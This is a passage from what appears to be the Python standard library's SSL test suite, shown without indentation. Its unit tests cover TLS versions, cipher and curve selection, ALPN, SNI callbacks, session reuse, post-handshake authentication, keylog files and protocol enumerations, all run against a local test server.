client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# test sometimes fails with EOF error. Test passes as long as
# server aborts connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8466, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
